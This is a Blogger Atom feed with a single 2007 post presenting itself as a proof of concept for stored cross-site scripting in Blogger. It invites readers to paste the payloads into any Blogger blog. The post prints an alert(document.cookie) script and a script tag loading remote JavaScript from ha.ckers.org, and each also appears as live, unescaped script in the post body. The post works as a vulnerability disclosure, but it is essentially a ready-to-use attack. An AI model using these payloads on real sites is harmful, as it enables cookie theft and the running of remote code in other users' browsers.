<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-567943726987443442</id><updated>2012-01-04T21:53:33.804+01:00</updated><title type='text'>P.O.C. A Siculezza.it</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pocasiculezza.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/567943726987443442/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pocasiculezza.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Daniele Costa</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp0.blogger.com/_MrdIg6K4dZM/R9WNb8m2O1I/AAAAAAAAAAs/hw2lB0HvMo8/S220/menew.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-567943726987443442.post-5402850683709288421</id><published>2007-08-11T18:42:00.000+02:00</published><updated>2007-08-11T18:52:52.816+02:00</updated><title type='text'>Blogger XSS : Proof Of Concept</title><content type='html'>Hi this blog was created as a proof of concept to demonstrate that Blogger didn't sanitize the code injected into a post.&lt;br /&gt;Just insert the following code to test into any blog created by Blogger...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;ot this code&lt;br /&gt;&lt;p&gt;&lt;strong&gt;&lt;br /&gt;&amp;lt;script src="http://ha.ckers.org/xss.js"&amp;gt;&amp;lt;/script&amp;gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&gt;&lt;script src="http://ha.ckers.org/xss.js"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/567943726987443442-5402850683709288421?l=pocasiculezza.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pocasiculezza.blogspot.com/feeds/5402850683709288421/comments/default' title='Commenti sul post'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=567943726987443442&amp;postID=5402850683709288421' title='1 Commenti'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/567943726987443442/posts/default/5402850683709288421'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/567943726987443442/posts/default/5402850683709288421'/><link rel='alternate' type='text/html' href='http://pocasiculezza.blogspot.com/2007/08/blogger-xss-proof-of-concept.html' title='Blogger XSS : Proof Of Concept'/><author><name>Daniele Costa</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp0.blogger.com/_MrdIg6K4dZM/R9WNb8m2O1I/AAAAAAAAAAs/hw2lB0HvMo8/S220/menew.jpg'/></author><thr:total>1</thr:total></entry></feed>
